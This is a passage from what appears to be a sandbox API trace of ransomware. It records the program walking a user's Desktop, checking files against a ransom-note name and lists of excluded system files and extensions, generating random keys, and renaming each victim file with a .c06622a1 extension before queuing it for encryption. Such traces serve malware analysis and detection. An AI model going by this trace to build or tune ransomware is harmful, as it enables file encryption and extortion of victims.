(_String="msu") returned 0x3 [0148.396] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0148.396] wcslen (_String="nls") returned 0x3 [0148.396] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0148.397] wcslen (_String="nomedia") returned 0x7 [0148.397] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0148.397] wcslen (_String="ocx") returned 0x3 [0148.397] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0148.397] wcslen (_String="prf") returned 0x3 [0148.397] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0148.397] wcslen (_String="ps1") returned 0x3 [0148.397] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0148.397] wcslen (_String="rom") returned 0x3 [0148.397] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0148.397] wcslen (_String="rtp") returned 0x3 [0148.397] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0148.397] wcslen (_String="scr") returned 0x3 [0148.397] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0148.397] wcslen (_String="shs") returned 0x3 [0148.397] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0148.397] wcslen (_String="spl") returned 0x3 [0148.397] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0148.397] wcslen (_String="sys") returned 0x3 [0148.397] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0148.397] wcslen (_String="theme") returned 0x5 [0148.397] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0148.397] wcslen (_String="themepack") returned 0x9 [0148.397] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0148.397] wcslen (_String="wpx") returned 0x3 [0148.397] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0148.397] wcslen (_String="lock") returned 0x4 [0148.397] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0148.397] wcslen (_String="key") returned 0x3 [0148.397] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0148.397] wcslen (_String="hta") returned 0x3 [0148.397] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0148.397] wcslen (_String="msi") returned 0x3 [0148.398] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0148.398] wcslen (_String="pdb") returned 0x3 [0148.398] _wcsicmp (_Str1="sql", _Str2="flv") returned 13 [0148.398] wcslen (_String="sql") returned 0x3 [0148.398] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0148.398] wcslen (_String="sqlite") returned 0x6 [0148.398] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.398] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.398] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.398] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.398] wcscpy (in: _Dest=0x44d00cc, _Source="NFtp.flv" | out: _Dest="NFtp.flv") returned="NFtp.flv" [0148.398] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NFtp.flv", dwFileAttributes=0x80) returned 1 [0148.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NFtp.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nftp.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0 [0148.398] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.398] ReadFile (in: hFile=0x2e0, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.399] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xa3afa215 [0148.399] RtlComputeCrc32 (PartialCrc=0xa215, Buffer=0x3feb74, Length=0x80) returned 0x50635cbf [0148.399] RtlComputeCrc32 (PartialCrc=0x5cbf, Buffer=0x3feb74, Length=0x80) returned 0xd6642e8b [0148.399] RtlComputeCrc32 (PartialCrc=0x2e8b, Buffer=0x3feb74, Length=0x80) returned 0x7166c5c9 [0148.399] RtlComputeCrc32 (PartialCrc=0xc5c9, Buffer=0x3feb74, Length=0x80) returned 0x9dcd6855 [0148.399] CloseHandle (hObject=0x2e0) returned 1 [0148.400] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.400] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NFtp.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NFtp.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NFtp.flv" [0148.400] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NFtp.flv") returned 0x32 [0148.400] wcscpy (in: _Dest=0x44e00e4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.400] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NFtp.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nftp.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NFtp.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nftp.flv.c06622a1"), dwFlags=0x8) returned 1 [0148.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NFtp.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nftp.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x2e0 [0148.404] CreateIoCompletionPort (FileHandle=0x2e0, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.404] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4b80020 [0148.410] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x10c12156 [0148.410] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x430e1e7a [0148.410] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x590411ab [0148.410] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3a4db30e [0148.410] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xda99ace [0148.410] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5df3d740 [0148.410] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4300d016 [0148.410] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5d16e772 [0148.413] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4b80094, Length=0x80) returned 0x50e136b1 [0148.413] RtlComputeCrc32 (PartialCrc=0x36b1, Buffer=0x4b80094, Length=0x80) returned 0xa620df30 [0148.413] RtlComputeCrc32 (PartialCrc=0xdf30, Buffer=0x4b80094, Length=0x80) returned 0x696ce2af [0148.413] RtlComputeCrc32 (PartialCrc=0xe2af, Buffer=0x4b80094, Length=0x80) returned 0x68e70538 [0148.413] RtlComputeCrc32 (PartialCrc=0x538, Buffer=0x4b80094, Length=0x80) returned 0x465ddfa2 [0148.413] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4b80020) returned 1 [0148.413] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.413] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.414] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7622cd90, ftCreationTime.dwHighDateTime=0x1d5e7ef, ftLastAccessTime.dwLowDateTime=0x74793a50, ftLastAccessTime.dwHighDateTime=0x1d5e25f, ftLastWriteTime.dwLowDateTime=0x74793a50, ftLastWriteTime.dwHighDateTime=0x1d5e25f, nFileSizeHigh=0x0, nFileSizeLow=0x875b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PZ5qHY.avi", cAlternateFileName="")) returned 1 [0148.414] _wcsicmp (_Str1="PZ5qHY.avi", _Str2="README.c06622a1.TXT") returned -2 [0148.414] wcsstr (_Str="PZ5qHY.avi", _SubStr="README") returned 0x0 [0148.414] _wcsicmp (_Str1="autorun.inf", _Str2="PZ5qHY.avi") returned -15 [0148.414] wcslen (_String="autorun.inf") returned 0xb [0148.414] _wcsicmp (_Str1="boot.ini", _Str2="PZ5qHY.avi") returned -14 [0148.414] wcslen (_String="boot.ini") returned 0x8 [0148.414] _wcsicmp (_Str1="bootfont.bin", _Str2="PZ5qHY.avi") returned -14 [0148.414] wcslen (_String="bootfont.bin") returned 0xc [0148.414] _wcsicmp (_Str1="bootsect.bak", _Str2="PZ5qHY.avi") returned -14 [0148.414] wcslen (_String="bootsect.bak") returned 0xc [0148.414] _wcsicmp (_Str1="desktop.ini", _Str2="PZ5qHY.avi") returned -12 [0148.414] wcslen (_String="desktop.ini") returned 0xb [0148.414] _wcsicmp (_Str1="iconcache.db", _Str2="PZ5qHY.avi") returned -7 [0148.414] wcslen (_String="iconcache.db") returned 0xc [0148.414] _wcsicmp (_Str1="ntldr", _Str2="PZ5qHY.avi") returned -2 [0148.414] wcslen (_String="ntldr") returned 0x5 [0148.414] _wcsicmp (_Str1="ntuser.dat", _Str2="PZ5qHY.avi") returned -2 [0148.414] wcslen (_String="ntuser.dat") returned 0xa [0148.414] _wcsicmp (_Str1="ntuser.dat.log", _Str2="PZ5qHY.avi") returned -2 [0148.414] wcslen (_String="ntuser.dat.log") returned 0xe [0148.414] _wcsicmp (_Str1="ntuser.ini", _Str2="PZ5qHY.avi") returned -2 [0148.414] wcslen (_String="ntuser.ini") returned 0xa [0148.414] _wcsicmp (_Str1="thumbs.db", _Str2="PZ5qHY.avi") returned 4 [0148.414] wcslen (_String="thumbs.db") returned 0x9 [0148.414] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0148.414] wcslen (_String="386") returned 0x3 [0148.415] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0148.415] wcslen (_String="adv") returned 0x3 [0148.415] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0148.415] wcslen (_String="ani") returned 0x3 [0148.415] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0148.415] wcslen (_String="bat") returned 0x3 [0148.415] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0148.415] wcslen (_String="bin") returned 0x3 [0148.415] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0148.415] wcslen (_String="cab") returned 0x3 [0148.415] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0148.415] wcslen (_String="cmd") returned 0x3 [0148.415] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0148.415] wcslen (_String="com") returned 0x3 [0148.415] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0148.415] wcslen (_String="cpl") returned 0x3 [0148.415] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0148.415] wcslen (_String="cur") returned 0x3 [0148.415] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0148.415] wcslen (_String="deskthemepack") returned 0xd [0148.415] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0148.415] wcslen (_String="diagcab") returned 0x7 [0148.415] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0148.415] wcslen (_String="diagcfg") returned 0x7 [0148.415] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0148.415] wcslen (_String="diagpkg") returned 0x7 [0148.415] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0148.415] wcslen (_String="dll") returned 0x3 [0148.415] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0148.415] wcslen (_String="drv") returned 0x3 [0148.416] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0148.416] wcslen (_String="exe") returned 0x3 [0148.416] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0148.416] wcslen (_String="hlp") returned 0x3 [0148.416] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0148.416] wcslen (_String="icl") returned 0x3 [0148.416] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0148.416] wcslen (_String="icns") returned 0x4 [0148.416] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0148.416] wcslen (_String="ico") returned 0x3 [0148.416] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0148.416] wcslen (_String="ics") returned 0x3 [0148.416] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0148.416] wcslen (_String="idx") returned 0x3 [0148.416] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0148.416] wcslen (_String="ldf") returned 0x3 [0148.416] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0148.416] wcslen (_String="lnk") returned 0x3 [0148.416] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0148.416] wcslen (_String="mod") returned 0x3 [0148.416] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0148.416] wcslen (_String="mpa") returned 0x3 [0148.416] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0148.416] wcslen (_String="msc") returned 0x3 [0148.416] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0148.416] wcslen (_String="msp") returned 0x3 [0148.416] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0148.416] wcslen (_String="msstyles") returned 0x8 [0148.416] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0148.416] wcslen (_String="msu") returned 0x3 [0148.416] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0148.417] wcslen (_String="nls") returned 0x3 [0148.417] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0148.417] wcslen (_String="nomedia") returned 0x7 [0148.417] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0148.417] wcslen (_String="ocx") returned 0x3 [0148.417] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0148.417] wcslen (_String="prf") returned 0x3 [0148.417] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0148.417] wcslen (_String="ps1") returned 0x3 [0148.417] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0148.417] wcslen (_String="rom") returned 0x3 [0148.417] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0148.417] wcslen (_String="rtp") returned 0x3 [0148.417] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0148.417] wcslen (_String="scr") returned 0x3 [0148.417] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0148.417] wcslen (_String="shs") returned 0x3 [0148.417] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0148.417] wcslen (_String="spl") returned 0x3 [0148.417] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0148.417] wcslen (_String="sys") returned 0x3 [0148.417] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0148.417] wcslen (_String="theme") returned 0x5 [0148.417] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0148.417] wcslen (_String="themepack") returned 0x9 [0148.417] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0148.417] wcslen (_String="wpx") returned 0x3 [0148.417] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0148.417] wcslen (_String="lock") returned 0x4 [0148.418] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0148.418] wcslen (_String="key") returned 0x3 [0148.418] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0148.418] wcslen (_String="hta") returned 0x3 [0148.418] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0148.418] wcslen (_String="msi") returned 0x3 [0148.418] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0148.418] wcslen (_String="pdb") returned 0x3 [0148.418] _wcsicmp (_Str1="sql", _Str2="avi") returned 18 [0148.418] wcslen (_String="sql") returned 0x3 [0148.418] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0148.418] wcslen (_String="sqlite") returned 0x6 [0148.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.418] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.418] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.418] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.418] wcscpy (in: _Dest=0x44d00cc, _Source="PZ5qHY.avi" | out: _Dest="PZ5qHY.avi") returned="PZ5qHY.avi" [0148.418] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PZ5qHY.avi", dwFileAttributes=0x80) returned 1 [0148.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PZ5qHY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pz5qhy.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x634 [0148.419] SetFilePointerEx (in: hFile=0x634, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.419] ReadFile (in: hFile=0x634, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.419] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x4390645f [0148.419] RtlComputeCrc32 (PartialCrc=0x645f, Buffer=0x3feb74, Length=0x80) returned 0x276c1e20 [0148.419] RtlComputeCrc32 (PartialCrc=0x1e20, Buffer=0x3feb74, Length=0x80) returned 0x3dd4b144 [0148.420] RtlComputeCrc32 (PartialCrc=0xb144, Buffer=0x3feb74, Length=0x80) returned 0xf95f5cbe [0148.420] RtlComputeCrc32 (PartialCrc=0x5cbe, Buffer=0x3feb74, Length=0x80) returned 0x16452bb2 [0148.420] CloseHandle (hObject=0x634) returned 1 [0148.420] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.420] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PZ5qHY.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PZ5qHY.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PZ5qHY.avi" [0148.420] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PZ5qHY.avi") returned 0x34 [0148.420] wcscpy (in: _Dest=0x44e00e8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.420] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PZ5qHY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pz5qhy.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PZ5qHY.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pz5qhy.avi.c06622a1"), dwFlags=0x8) returned 1 [0148.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PZ5qHY.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pz5qhy.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x634 [0148.422] CreateIoCompletionPort (FileHandle=0x634, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.422] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4c10020 [0148.428] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2ff18aae [0148.428] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x33e3062e [0148.428] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7f1d60d6 [0148.428] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d07607d [0148.428] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x49606393 [0148.428] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x19e13dd9 [0148.428] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x40a4c584 [0148.428] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1cfc582e [0148.431] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4c10094, Length=0x80) returned 0xbab525ef [0148.431] RtlComputeCrc32 (PartialCrc=0x25ef, Buffer=0x4c10094, Length=0x80) returned 0xc994a185 [0148.431] RtlComputeCrc32 (PartialCrc=0xa185, Buffer=0x4c10094, Length=0x80) returned 0x14cef2da [0148.431] RtlComputeCrc32 (PartialCrc=0xf2da, Buffer=0x4c10094, Length=0x80) returned 0x74dda496 [0148.431] RtlComputeCrc32 (PartialCrc=0xa496, Buffer=0x4c10094, Length=0x80) returned 0xc533f64f [0148.431] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4c10020) returned 1 [0148.432] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.432] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.432] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67b12e0, ftCreationTime.dwHighDateTime=0x1d5dedf, ftLastAccessTime.dwLowDateTime=0xc86cc6e0, ftLastAccessTime.dwHighDateTime=0x1d5df99, ftLastWriteTime.dwLowDateTime=0xc86cc6e0, ftLastWriteTime.dwHighDateTime=0x1d5df99, nFileSizeHigh=0x0, nFileSizeLow=0x14816, dwReserved0=0x0, dwReserved1=0x0, cFileName="qj-mntX.flv", cAlternateFileName="")) returned 1 [0148.432] _wcsicmp (_Str1="qj-mntX.flv", _Str2="README.c06622a1.TXT") returned -1 [0148.432] wcsstr (_Str="qj-mntX.flv", _SubStr="README") returned 0x0 [0148.432] _wcsicmp (_Str1="autorun.inf", _Str2="qj-mntX.flv") returned -16 [0148.432] wcslen (_String="autorun.inf") returned 0xb [0148.432] _wcsicmp (_Str1="boot.ini", _Str2="qj-mntX.flv") returned -15 [0148.432] wcslen (_String="boot.ini") returned 0x8 [0148.432] _wcsicmp (_Str1="bootfont.bin", _Str2="qj-mntX.flv") returned -15 [0148.432] wcslen (_String="bootfont.bin") returned 0xc [0148.432] _wcsicmp (_Str1="bootsect.bak", _Str2="qj-mntX.flv") returned -15 [0148.432] wcslen (_String="bootsect.bak") returned 0xc [0148.432] _wcsicmp (_Str1="desktop.ini", _Str2="qj-mntX.flv") returned -13 [0148.432] wcslen (_String="desktop.ini") returned 0xb [0148.432] _wcsicmp (_Str1="iconcache.db", _Str2="qj-mntX.flv") returned -8 [0148.432] wcslen (_String="iconcache.db") returned 0xc [0148.432] _wcsicmp (_Str1="ntldr", _Str2="qj-mntX.flv") returned -3 [0148.432] wcslen (_String="ntldr") returned 0x5 [0148.432] _wcsicmp (_Str1="ntuser.dat", _Str2="qj-mntX.flv") returned -3 [0148.432] wcslen (_String="ntuser.dat") returned 0xa [0148.432] _wcsicmp (_Str1="ntuser.dat.log", _Str2="qj-mntX.flv") returned -3 [0148.432] wcslen (_String="ntuser.dat.log") returned 0xe [0148.432] _wcsicmp (_Str1="ntuser.ini", _Str2="qj-mntX.flv") returned -3 [0148.432] wcslen (_String="ntuser.ini") returned 0xa [0148.432] _wcsicmp (_Str1="thumbs.db", _Str2="qj-mntX.flv") returned 3 [0148.432] wcslen (_String="thumbs.db") returned 0x9 [0148.432] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0148.433] wcslen (_String="386") returned 0x3 [0148.433] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0148.433] wcslen (_String="adv") returned 0x3 [0148.433] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0148.433] wcslen (_String="ani") returned 0x3 [0148.433] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0148.433] wcslen (_String="bat") returned 0x3 [0148.433] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0148.433] wcslen (_String="bin") returned 0x3 [0148.433] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0148.433] wcslen (_String="cab") returned 0x3 [0148.433] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0148.433] wcslen (_String="cmd") returned 0x3 [0148.433] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0148.433] wcslen (_String="com") returned 0x3 [0148.433] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0148.433] wcslen (_String="cpl") returned 0x3 [0148.433] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0148.433] wcslen (_String="cur") returned 0x3 [0148.433] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0148.434] wcslen (_String="deskthemepack") returned 0xd [0148.434] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0148.434] wcslen (_String="diagcab") returned 0x7 [0148.434] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0148.434] wcslen (_String="diagcfg") returned 0x7 [0148.434] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0148.434] wcslen (_String="diagpkg") returned 0x7 [0148.434] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0148.434] wcslen (_String="dll") returned 0x3 [0148.434] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0148.434] wcslen (_String="drv") returned 0x3 [0148.434] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0148.434] wcslen (_String="exe") returned 0x3 [0148.434] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0148.434] wcslen (_String="hlp") returned 0x3 [0148.434] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0148.434] wcslen (_String="icl") returned 0x3 [0148.434] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0148.434] wcslen (_String="icns") returned 0x4 [0148.434] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0148.434] wcslen (_String="ico") returned 0x3 [0148.434] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0148.434] wcslen (_String="ics") returned 0x3 [0148.434] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0148.434] wcslen (_String="idx") returned 0x3 [0148.434] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0148.434] wcslen (_String="ldf") returned 0x3 [0148.434] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0148.434] wcslen (_String="lnk") returned 0x3 [0148.434] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0148.434] wcslen (_String="mod") returned 0x3 [0148.434] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0148.435] wcslen (_String="mpa") returned 0x3 [0148.435] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0148.435] wcslen (_String="msc") returned 0x3 